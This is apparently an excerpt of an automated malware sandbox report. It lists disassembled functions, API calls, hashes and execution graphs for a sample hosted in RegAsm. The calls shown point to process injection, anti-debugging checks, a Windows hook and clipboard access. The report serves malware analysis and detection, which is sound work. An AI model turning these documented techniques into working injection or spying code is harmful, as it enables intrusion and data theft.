                                control_flow_graph 467 d33b89-d33bdc 469 d33be8-d33c14 Wow64SetThreadContext 467->469 470 d33bde-d33be6 467->470 471 d33c16-d33c1c 469->471 472 d33c1d-d33c45 469->472 470->469 471->472
                                APIs
                                • Wow64SetThreadContext.KERNEL32(02767DE0,00000000), ref: 00D33C07
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 614de85ea3f2e6b723799ecb35596a24d3da45926346adaab412c8ec5344ac27
                                • Instruction ID: 8a61502d465ccc147dc48388afea71e89e2c4dfa5b8996d5bbc58b927fa428ba
                                • Opcode Fuzzy Hash: 614de85ea3f2e6b723799ecb35596a24d3da45926346adaab412c8ec5344ac27
                                • Instruction Fuzzy Hash: 042115B5D006599FCB10CFAAC545BEEFBF4AB48720F14812AD418B7351D378AA44CFA1
                                Function 00D33C51 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 475 d33c51-d33ce4 ReadProcessMemory 477 d33ce6-d33cec 475->477 478 d33ced-d33d15 475->478 477->478
                                APIs
                                • ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 00D33CD7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 6739c8f24d766387be4b4d8a78cbada1127a118d05220f511afa39cecc7dd8fb
                                • Instruction ID: fdaedf104ed49552fc447baeae3cd92d67e49cc169314a4388fcc84b2a4d2438
                                • Opcode Fuzzy Hash: 6739c8f24d766387be4b4d8a78cbada1127a118d05220f511afa39cecc7dd8fb
                                • Instruction Fuzzy Hash: 1421F5B5900259DFCB10CF9AD984ADEBBF5FF48310F14842AE958A7250D3759944CFA4
                                Function 00D32228 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 00D33D93
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: ccaa4a949740ad090d4d51eae6208c8335f60445df3d4eb542174be79a2a4e6b
                                • Instruction ID: 9fbea4402a674a94562183a3fadb03c55bc31ed385cf6547331922a1a36d5e6b
                                • Opcode Fuzzy Hash: ccaa4a949740ad090d4d51eae6208c8335f60445df3d4eb542174be79a2a4e6b
                                • Instruction Fuzzy Hash: 701104B5900248DFCB20DF9AD944BDEBFF9EB48320F248429E559A7260C775A940CFA4
                                Function 00D33D20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 00D33D93
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 8b2e47cfc6856b0f5e7601751b0b557a54a9fdfe605d204095df0acd2b6d0eb5
                                • Instruction ID: 9fa705bc3f92a851c8babab0be29350ae9cb520009fc8f06e4b68cbfae6ec832
                                • Opcode Fuzzy Hash: 8b2e47cfc6856b0f5e7601751b0b557a54a9fdfe605d204095df0acd2b6d0eb5
                                • Instruction Fuzzy Hash: 181126B99002489FCB10CF99D944BDEBFF4AB48310F24841AE559A7220C375A944CFA0
                                Function 00D32258 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                • ResumeThread.KERNEL32(02767DE0), ref: 00D33F1F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 89c5b7807b54ee69d49030363dd4162c3c59c477f092959842d54f1df7b6d9a4
                                • Instruction ID: e6beef153395bb26ffd44c47f34d255bc9ad14fffdf98f6657ed1b3014fde433
                                • Opcode Fuzzy Hash: 89c5b7807b54ee69d49030363dd4162c3c59c477f092959842d54f1df7b6d9a4
                                • Instruction Fuzzy Hash: 681122B5900248CFCB20DF9AC548B9EFBF8EB48320F20846AE558A7310C775A940CFA4
                                Function 00D33EB9 Relevance: 1.5, APIs: 1, Instructions: 47threadCOMMON
                                Download Yara Rule
                                APIs
                                • ResumeThread.KERNEL32(02767DE0), ref: 00D33F1F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 90af2ffb58891a13c84ffab94f4fde20199d988606c09afc1f96ebf9b9f4d266
                                • Instruction ID: 556e55488237f0f307e74bb29b385bfd93416eded1bc70e4e36d9a3da57bade1
                                • Opcode Fuzzy Hash: 90af2ffb58891a13c84ffab94f4fde20199d988606c09afc1f96ebf9b9f4d266
                                • Instruction Fuzzy Hash: 411110B5800249CFCB20DFAAC544BDEFBF4AF48320F24846AD458A7260C774A944CFA5
                                Function 00CDD76D Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724661446.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_cdd000_450230549.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e531b32ad8a86cb3ae283ef177a7961460cd1c2a9e3043f30757fe5672b3a89f
                                • Instruction ID: 6eb0d44d13bd19292ef3a6ec9d8e09804091d771e21268e6c5704bfce0288236
                                • Opcode Fuzzy Hash: e531b32ad8a86cb3ae283ef177a7961460cd1c2a9e3043f30757fe5672b3a89f
                                • Instruction Fuzzy Hash: 6801A7314083449AE7108A1ADD84B67FFD8EF41324F19C4ABEE1A4A38AC3799D80C671
                                Function 00CDD76C Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724661446.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_cdd000_450230549.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3b204a8af0bdf339f7a2f3c112c7fc7fdee0154340c3962a571760ea52a43a70
                                • Instruction ID: b86f2d2a4966c4a9274d1e1414cb47fcc9bc118b2b5a2d9fc3ef8b2e2db811e6
                                • Opcode Fuzzy Hash: 3b204a8af0bdf339f7a2f3c112c7fc7fdee0154340c3962a571760ea52a43a70
                                • Instruction Fuzzy Hash: FAF062714083449EE7108E1ADC84B62FFE8EB51724F18C45BED594A28AC2799C44CA71

                                Non-executed Functions

                                Function 00D32B19 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1724855106.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d30000_450230549.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 850225d9caa5bf5450e41c606c25799f734dfb65ab247183d89f010fe3ed45ad
                                • Instruction ID: 90c40d2aafc84ff8a8933caf6187d25e2941e7a71fb88c42653fd634be7f3bb8
                                • Opcode Fuzzy Hash: 850225d9caa5bf5450e41c606c25799f734dfb65ab247183d89f010fe3ed45ad
                                • Instruction Fuzzy Hash: E7219AB1D056688BEB19CF679C147DAFBF6AFC9300F14C1AAC408AA254DB740A468F51

                                Execution Graph

                                Execution Coverage:10.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:1.5%
                                Total number of Nodes:194
                                Total number of Limit Nodes:22
                                execution_graph 38076 c0d030 38077 c0d048 38076->38077 38078 c0d0a2 38077->38078 38083 60f3118 38077->38083 38087 60f310b 38077->38087 38091 60f2d04 38077->38091 38099 60f77a6 38077->38099 38084 60f313e 38083->38084 38085 60f2d04 2 API calls 38084->38085 38086 60f315f 38085->38086 38086->38078 38088 60f3118 38087->38088 38089 60f2d04 2 API calls 38088->38089 38090 60f315f 38089->38090 38090->38078 38093 60f2d0f 38091->38093 38092 60f7809 38119 60f66e4 38092->38119 38093->38092 38095 60f77f9 38093->38095 38107 60f7920 38095->38107 38113 60f7930 38095->38113 38096 60f7807 38096->38096 38101 60f77a8 38099->38101 38100 60f7809 38102 60f66e4 2 API calls 38100->38102 38101->38100 38103 60f77f9 38101->38103 38104 60f7807 38102->38104 38105 60f7920 2 API calls 38103->38105 38106 60f7930 2 API calls 38103->38106 38104->38104 38105->38104 38106->38104 38109 60f7930 38107->38109 38108 60f66e4 2 API calls 38108->38109 38109->38108 38110 60f7a1a 38109->38110 38126 60f7e10 38109->38126 38131 60f7e00 38109->38131 38110->38096 38115 60f793e 38113->38115 38114 60f66e4 2 API calls 38114->38115 38115->38114 38116 60f7a1a 38115->38116 38117 60f7e00 OleGetClipboard 38115->38117 38118 60f7e10 OleGetClipboard 38115->38118 38116->38096 38117->38115 38118->38115 38120 60f66ef 38119->38120 38121 60f7b1c 38120->38121 38122 60f7a72 38120->38122 38124 60f2d04 OleGetClipboard 38121->38124 38123 60f7aca CallWindowProcW 38122->38123 38125 60f7a79 38122->38125 38123->38125 38124->38125 38125->38096 38128 60f7e2f 38126->38128 38127 60f7e83 38127->38109 38128->38127 38136 60f7faf 38128->38136 38142 60f7fc0 38128->38142 38132 60f7e06 38131->38132 38133 60f7df6 38132->38133 38134 60f7faf OleGetClipboard 38132->38134 38135 60f7fc0 OleGetClipboard 38132->38135 38133->38109 38134->38132 38135->38132 38138 60f7fba 38136->38138 38137 60f7fdc 38137->38128 38138->38137 38148 60f83fa 38138->38148 38159 60f8408 38138->38159 38139 60f7ff1 38139->38128 38144 60f7fc8 38142->38144 38143 60f7fdc 38143->38128 38144->38143 38146 60f83fa OleGetClipboard 38144->38146 38147 60f8408 OleGetClipboard 38144->38147 38145 60f7ff1 38145->38128 38146->38145 38147->38145 38149 60f8402 38148->38149 38150 60f8435 38149->38150 38152 60f8479 38149->38152 38155 60f83fa OleGetClipboard 38150->38155 38156 60f8408 OleGetClipboard 38150->38156 38151 60f843b 38151->38139 38154 60f84f9 38152->38154 38170 60f86c0 38152->38170 38174 60f86d0 38152->38174 38153 60f8517 38153->38139 38154->38139 38155->38151 38156->38151 38160 60f841a 38159->38160 38161 60f8435 38160->38161 38163 60f8479 38160->38163 38166 60f83fa OleGetClipboard 38161->38166 38167 60f8408 OleGetClipboard 38161->38167 38162 60f843b 38162->38139 38165 60f84f9 38163->38165 38168 60f86c0 OleGetClipboard 38163->38168 38169 60f86d0 OleGetClipboard 38163->38169 38164 60f8517 38164->38139 38165->38139 38166->38162 38167->38162 38168->38164 38169->38164 38172 60f86e5 38170->38172 38173 60f870b 38172->38173 38178 60f8140 38172->38178 38173->38153 38176 60f86e5 38174->38176 38175 60f8140 OleGetClipboard 38175->38176 38176->38175 38177 60f870b 38176->38177 38177->38153 38179 60f8778 OleGetClipboard 38178->38179 38181 60f8812 38179->38181 37963 ea0848 37964 ea084e 37963->37964 37965 ea091b 37964->37965 37968 ea149b 37964->37968 37973 ea15d8 37964->37973 37970 ea14ae 37968->37970 37969 ea15d2 37969->37964 37970->37969 37972 ea15d8 2 API calls 37970->37972 37978 ea8868 37970->37978 37972->37970 37974 ea14ae 37973->37974 37975 ea15d2 37973->37975 37974->37975 37976 ea8868 2 API calls 37974->37976 37977 ea15d8 2 API calls 37974->37977 37975->37964 37976->37974 37977->37974 37979 ea8872 37978->37979 37980 ea888c 37979->37980 37984 617fc70 37979->37984 37993 617fa20 37979->37993 37997 617fa30 37979->37997 37980->37970 37987 617fc7a 37984->37987 37988 617fa45 37984->37988 37985 617fc5a 37985->37980 37986 617fe54 37986->37980 37987->37986 38001 eaf2a8 37987->38001 38004 eaf298 37987->38004 37988->37985 37990 617fc70 GlobalMemoryStatusEx GlobalMemoryStatusEx 37988->37990 37989 617fd73 37989->37980 37990->37988 37995 617fa30 37993->37995 37994 617fc5a 37994->37980 37995->37994 37996 617fc70 GlobalMemoryStatusEx GlobalMemoryStatusEx 37995->37996 37996->37995 37999 617fa45 37997->37999 37998 617fc5a 37998->37980 37999->37998 38000 617fc70 GlobalMemoryStatusEx GlobalMemoryStatusEx 37999->38000 38000->37999 38008 eaf2d0 38001->38008 38002 eaf2b6 38002->37989 38005 eaf2a8 38004->38005 38007 eaf2d0 2 API calls 38005->38007 38006 eaf2b6 38006->37989 38007->38006 38009 eaf2ed 38008->38009 38010 eaf315 38008->38010 38009->38002 38016 eaf2d0 GlobalMemoryStatusEx 38010->38016 38017 eaf3b8 38010->38017 38011 eaf336 38011->38002 38012 eaf332 38012->38011 38013 eaf3fe GlobalMemoryStatusEx 38012->38013 38014 eaf42e 38013->38014 38014->38002 38016->38012 38018 eaf3fe GlobalMemoryStatusEx 38017->38018 38019 eaf42e 38018->38019 38019->38012 38020 60f1aab 38021 60f1ab0 GetModuleHandleW 38020->38021 38023 60f1b25 38021->38023 38024 60f0108 38025 60f0115 38024->38025 38026 60f012a 38025->38026 38029 60f1088 38025->38029 38036 60f1073 38025->38036 38030 60f10b3 38029->38030 38043 60f15f1 38030->38043 38047 60f1600 38030->38047 38031 60f1136 38032 60f1162 38031->38032 38033 60f03f4 GetModuleHandleW 38031->38033 38032->38032 38033->38032 38037 60f1088 38036->38037 38041 60f15f1 GetModuleHandleW 38037->38041 38042 60f1600 GetModuleHandleW 38037->38042 38038 60f1136 38039 60f03f4 GetModuleHandleW 38038->38039 38040 60f1162 38038->38040 38039->38040 38041->38038 38042->38038 38044 60f1600 38043->38044 38045 60f16ae 38044->38045 38051 60f17cf 38044->38051 38048 60f162d 38047->38048 38049 60f16ae 38048->38049 38050 60f17cf GetModuleHandleW 38048->38050 38050->38049 38052 60f17da 38051->38052 38059 60f03f4 38052->38059 38054 60f18fa 38055 60f03f4 GetModuleHandleW 38054->38055 38058 60f1974 38054->38058 38056 60f1948 38055->38056 38057 60f03f4 GetModuleHandleW 38056->38057 38056->38058 38057->38058 38058->38045 38060 60f1ab0 GetModuleHandleW 38059->38060 38062 60f1b25 38060->38062 38062->38054 38063 60fa168 38066 60fa1ac SetWindowsHookExA 38063->38066 38065 60fa1f2 38066->38065 38182 60f2b58 38183 60f2bc0 CreateWindowExW 38182->38183 38185 60f2c7c 38183->38185 38185->38185 38186 ea71d0 38187 ea7214 CheckRemoteDebuggerPresent 38186->38187 38188 ea7256 38187->38188 38067 60f6ba0 DuplicateHandle 38068 60f6c36 38067->38068 38069 60f85e0 38070 60f85eb 38069->38070 38072 60f85fb 38070->38072 38073 60f8028 38070->38073 38074 60f8630 OleInitialize 38073->38074 38075 60f8694 38074->38075 38075->38072 38189 60f7d30 38190 60f7d38 38189->38190 38192 60f7d5b 38190->38192 38193 60f673c 38190->38193 38194 60f7d70 KiUserCallbackDispatcher 38193->38194 38196 60f7dde 38194->38196 38196->38190

                                Executed Functions

                                Function 06173050 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 130 6173050-6173071 131 6173073-6173076 130->131 132 6173817-617381a 131->132 133 617307c-617309b 131->133 134 6173840-6173842 132->134 135 617381c-617383b 132->135 143 61730b4-61730be 133->143 144 617309d-61730a0 133->144 137 6173844 134->137 138 6173849-617384c 134->138 135->134 137->138 138->131 140 6173852-617385b 138->140 148 61730c4-61730d3 143->148 144->143 145 61730a2-61730b2 144->145 145->148 256 61730d5 call 6173870 148->256 257 61730d5 call 6173868 148->257 149 61730da-61730df 150 61730e1-61730e7 149->150 151 61730ec-61733c9 149->151 150->140 172 61733cf-617347e 151->172 173 6173809-6173816 151->173 182 61734a7 172->182 183 6173480-61734a5 172->183 185 61734b0-61734c3 182->185 183->185 187 61737f0-61737fc 185->187 188 61734c9-61734eb 185->188 187->172 189 6173802 187->189 188->187 191 61734f1-61734fb 188->191 189->173 191->187 192 6173501-617350c 191->192 192->187 193 6173512-61735e8 192->193 205 61735f6-6173626 193->205 206 61735ea-61735ec 193->206 210 6173634-6173640 205->210 211 6173628-617362a 205->211 206->205 212 6173642-6173646 210->212 213 61736a0-61736a4 210->213 211->210 212->213 216 6173648-6173672 212->216 214 61737e1-61737ea 213->214 215 61736aa-61736e6 213->215 214->187 214->193 227 61736f4-6173702 215->227 228 61736e8-61736ea 215->228 223 6173674-6173676 216->223 224 6173680-617369d 216->224 223->224 224->213 230 6173704-617370f 227->230 231 6173719-6173724 227->231 228->227 230->231 234 6173711 230->234 235 6173726-617372c 231->235 236 617373c-617374d 231->236 234->231 237 6173730-6173732 235->237 238 617372e 235->238 240 6173765-6173771 236->240 241 617374f-6173755 236->241 237->236 238->236 245 6173773-6173779 240->245 246 6173789-61737da 240->246 242 6173757 241->242 243 6173759-617375b 241->243 242->240 243->240 247 617377d-617377f 245->247 248 617377b 245->248 246->214 247->246 248->246 256->149 257->149
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                • API String ID: 0-2392861976
                                • Opcode ID: 0d18dd62c9dd154e421aa4559386db281358165202b1c00a2348a8f24f9e69b3
                                • Instruction ID: e8ae82c88c458683fde75e50b76ed428dcb9074cf5efbe9f4c447c106f9398dd
                                • Opcode Fuzzy Hash: 0d18dd62c9dd154e421aa4559386db281358165202b1c00a2348a8f24f9e69b3
                                • Instruction Fuzzy Hash: 02321F31E1075ACFCB14EF75C89459DB7B2BFC9300F1086AAD419AB264EF30A985CB91
                                Function 06177D80 Relevance: 3.0, Strings: 2, Instructions: 476COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 803 6177d80-6177d9e 804 6177da0-6177da3 803->804 805 6177da5-6177daf 804->805 806 6177db0-6177db3 804->806 807 6177db5-6177dcf 806->807 808 6177dd4-6177dd7 806->808 807->808 809 6177dfa-6177dfd 808->809 810 6177dd9-6177df5 808->810 811 6177e14-6177e16 809->811 812 6177dff-6177e0d 809->812 810->809 815 6177e1d-6177e20 811->815 816 6177e18 811->816 818 6177e26-6177e3c 812->818 821 6177e0f 812->821 815->804 815->818 816->815 823 6178057-6178061 818->823 824 6177e42-6177e4b 818->824 821->811 825 6178062-6178097 824->825 826 6177e51-6177e6e 824->826 829 6178099-617809c 825->829 833 6178044-6178051 826->833 834 6177e74-6177e9c 826->834 831 61780bf-61780c2 829->831 832 617809e-61780ba 829->832 835 61782f7-61782fa 831->835 836 61780c8-61780d7 831->836 832->831 833->823 833->824 834->833 858 6177ea2-6177eab 834->858 837 61783a5-61783a7 835->837 838 6178300-617830c 835->838 845 61780f6-617813a 836->845 846 61780d9-61780f4 836->846 841 61783ae-61783b1 837->841 842 61783a9 837->842 844 6178317-6178319 838->844 841->829 847 61783b7-61783c0 841->847 842->841 849 6178331-6178335 844->849 850 617831b-6178321 844->850 860 6178140-6178151 845->860 861 61782cb-61782e1 845->861 846->845 855 6178337-6178341 849->855 856 6178343 849->856 852 6178325-6178327 850->852 853 6178323 850->853 852->849 853->849 859 6178348-617834a 855->859 856->859 858->825 862 6177eb1-6177ecd 858->862 864 617834c-617834f 859->864 865 617835b-6178394 859->865 871 6178157-6178174 860->871 872 61782b6-61782c5 860->872 861->835 873 6177ed3-6177efd 862->873 874 6178032-617803e 862->874 864->847 865->836 885 617839a-61783a4 865->885 871->872 882 617817a-6178270 call 61765a8 871->882 872->860 872->861 887 6177f03-6177f2b 873->887 888 6178028-617802d 873->888 874->833 874->858 936 6178272-617827c 882->936 937 617827e 882->937 887->888 894 6177f31-6177f5f 887->894 888->874 894->888 899 6177f65-6177f6e 894->899 899->888 901 6177f74-6177fa6 899->901 909 6177fb1-6177fcd 901->909 910 6177fa8-6177fac 901->910 909->874 912 6177fcf-6178026 call 61765a8 909->912 910->888 911 6177fae 910->911 911->909 912->874 938 6178283-6178285 936->938 937->938 938->872 939 6178287-617828c 938->939 940 617828e-6178298 939->940 941 617829a 939->941 942 617829f-61782a1 940->942 941->942 942->872 943 61782a3-61782af 942->943 943->872
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q
                                • API String ID: 0-355816377
                                • Opcode ID: 5143c2da0eca2640bef49d4d5d4230a3e652534b8ea017de20e39fbaf687b954
                                • Instruction ID: e185beeb6c8b731c641c3d0b778c45265f41f8906f866611748ef14fd1868476
                                • Opcode Fuzzy Hash: 5143c2da0eca2640bef49d4d5d4230a3e652534b8ea017de20e39fbaf687b954
                                • Instruction Fuzzy Hash: 5B029C30B006059FDB94DB78D484AAEB7F2EF84304F148969E40ADB395DB31ED86CB91
                                Function 06175590 Relevance: 1.9, Strings: 1, Instructions: 601COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1824 6175590-61755ad 1825 61755af-61755b2 1824->1825 1826 6175604-617560d 1825->1826 1827 61755b4-61755b7 1825->1827 1828 617560f 1826->1828 1829 617568a-6175693 1826->1829 1830 61755c4-61755c7 1827->1830 1831 61755b9-61755bf 1827->1831 1832 6175614-6175617 1828->1832 1833 6175775-61757a3 1829->1833 1834 6175699-61756a4 1829->1834 1835 61755de-61755e1 1830->1835 1836 61755c9-61755d9 1830->1836 1831->1830 1839 617563d-6175640 1832->1839 1840 6175619-6175638 1832->1840 1860 61757ad-61757b0 1833->1860 1834->1833 1841 61756aa-61756ba 1834->1841 1837 61755e3-61755e7 1835->1837 1838 61755f2-61755f5 1835->1838 1836->1835 1845 6175767-6175774 1837->1845 1846 61755ed 1837->1846 1847 61755f7-61755fc 1838->1847 1848 61755ff-6175602 1838->1848 1843 6175642-6175653 1839->1843 1844 6175658-617565b 1839->1844 1840->1839 1841->1833 1850 61756c0-61756c4 1841->1850 1843->1844 1851 6175665-6175668 1844->1851 1852 617565d-6175662 1844->1852 1846->1838 1847->1848 1848->1826 1848->1832 1854 61756c9-61756cc 1850->1854 1858 6175685-6175688 1851->1858 1859 617566a-6175680 1851->1859 1852->1851 1855 61756ce-61756d1 1854->1855 1856 61756fa-61756fd 1854->1856 1861 61756d3-61756d4 1855->1861 1862 61756d9-61756dc 1855->1862 1863 61756ff 1856->1863 1864 6175738-6175750 1856->1864 1858->1829 1858->1854 1859->1858 1865 61757d2-61757d5 1860->1865 1866 61757b2-61757b6 1860->1866 1861->1862 1870 61756f5-61756f8 1862->1870 1871 61756de-61756f0 1862->1871 1872 6175704-6175707 1863->1872 1884 6175755-6175757 1864->1884 1868 61757f7-61757fa 1865->1868 1869 61757d7-61757db 1865->1869 1874 61758a2-61758dc 1866->1874 1875 61757bc-61757c4 1866->1875 1878 617581c-617581f 1868->1878 1879 61757fc-6175800 1868->1879 1869->1874 1876 61757e1-61757e9 1869->1876 1870->1856 1870->1872 1871->1870 1880 6175717-617571a 1872->1880 1881 6175709-6175710 1872->1881 1906 61758de-61758e1 1874->1906 1875->1874 1882 61757ca-61757cd 1875->1882 1876->1874 1883 61757ef-61757f2 1876->1883 1887 6175821-6175828 1878->1887 1888 6175829-617582c 1878->1888 1879->1874 1886 6175806-617580e 1879->1886 1890 6175726-6175729 1880->1890 1891 617571c-6175725 1880->1891 1881->1861 1889 6175712 1881->1889 1882->1865 1883->1868 1893 617575e-6175761 1884->1893 1894 6175759 1884->1894 1886->1874 1895 6175814-6175817 1886->1895 1896 6175846-6175849 1888->1896 1897 617582e-6175832 1888->1897 1889->1880 1898 6175733-6175736 1890->1898 1899 617572b-617572e 1890->1899 1893->1825 1893->1845 1894->1893 1895->1878 1902 617584b-6175852 1896->1902 1903 6175859-617585c 1896->1903 1897->1874 1901 6175834-617583c 1897->1901 1898->1864 1898->1884 1899->1898 1901->1874 1909 617583e-6175841 1901->1909 1904 6175854 1902->1904 1905 617589a-61758a1 1902->1905 1907 6175874-6175877 1903->1907 1908 617585e-617586f 1903->1908 1904->1903 1910 61758e3-61758f4 1906->1910 1911 61758ff-6175902 1906->1911 1912 6175879-6175883 1907->1912 1913 6175888-617588a 1907->1913 1908->1907 1909->1896 1923 6175ca5-6175cb8 1910->1923 1924 61758fa 1910->1924 1915 6175904-6175907 1911->1915 1916 6175972-6175b06 1911->1916 1912->1913 1917 6175891-6175894 1913->1917 1918 617588c 1913->1918 1921 6175925-6175928 1915->1921 1922 6175909-617591a 1915->1922 1974 6175c3f-6175c52 1916->1974 1975 6175b0c-6175b13 1916->1975 1917->1860 1917->1905 1918->1917 1926 6175946-6175949 1921->1926 1927 617592a-617593b 1921->1927 1935 6175c77-6175c7e 1922->1935 1936 6175920 1922->1936 1924->1911 1928 6175957-617595a 1926->1928 1929 617594b-6175952 1926->1929 1927->1935 1938 6175941 1927->1938 1933 6175964-6175967 1928->1933 1934 617595c-6175961 1928->1934 1929->1928 1933->1916 1939 6175969-617596c 1933->1939 1934->1933 1940 6175c83-6175c86 1935->1940 1936->1921 1938->1926 1939->1916 1941 6175c55-6175c58 1939->1941 1942 6175ca0-6175ca3 1940->1942 1943 6175c88-6175c99 1940->1943 1946 6175c72-6175c75 1941->1946 1947 6175c5a-6175c6b 1941->1947 1942->1923 1945 6175cbb-6175cbd 1942->1945 1943->1947 1954 6175c9b 1943->1954 1949 6175cc4-6175cc7 1945->1949 1950 6175cbf 1945->1950 1946->1935 1946->1940 1947->1935 1956 6175c6d 1947->1956 1949->1906 1952 6175ccd-6175cd6 1949->1952 1950->1949 1954->1942 1956->1946 1976 6175bc7-6175bce 1975->1976 1977 6175b19-6175b4c 1975->1977 1976->1974 1978 6175bd0-6175c03 1976->1978 1988 6175b51-6175b92 1977->1988 1989 6175b4e 1977->1989 1990 6175c05 1978->1990 1991 6175c08-6175c35 1978->1991 1999 6175b94-6175ba5 1988->1999 2000 6175baa-6175bb1 1988->2000 1989->1988 1990->1991 1991->1952 1999->1952 2002 6175bb9-6175bbb 2000->2002 2002->1952
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: f41cd36c6fbdc6a5869af46bcdb78413759b9270111770d176a78ec62f2d5b33
                                • Instruction ID: c972a31ae60c4ff576b8434dc44da70954f069ab34a413ba72a197f9b0ae7510
                                • Opcode Fuzzy Hash: f41cd36c6fbdc6a5869af46bcdb78413759b9270111770d176a78ec62f2d5b33
                                • Instruction Fuzzy Hash: A322BE75E002198FDF64DBA8C4806AEBBF3EF89314F248469D449AB385DB31DD46CB91
                                Function 00EA71D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00EA7247
                                Memory Dump Source
                                • Source File: 00000003.00000002.3558473581.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_ea0000_RegAsm.jbxd
                                Similarity
                                • API ID: CheckDebuggerPresentRemote
                                • String ID:
                                • API String ID: 3662101638-0
                                • Opcode ID: 2f8efea0082b58ddc27b1a4816aaf4aeec547521d40a826cd7a3f3f5f3cd0b92
                                • Instruction ID: d0da1bea48e3004bcff8f940a9857387d1567ef6c06fb954d9f449dfa359ed3f
                                • Opcode Fuzzy Hash: 2f8efea0082b58ddc27b1a4816aaf4aeec547521d40a826cd7a3f3f5f3cd0b92
                                • Instruction Fuzzy Hash: 6C2137B2801259CFCB10CF9AD884BEEFBF4AF49324F14846AE459B7250D778A944CF65
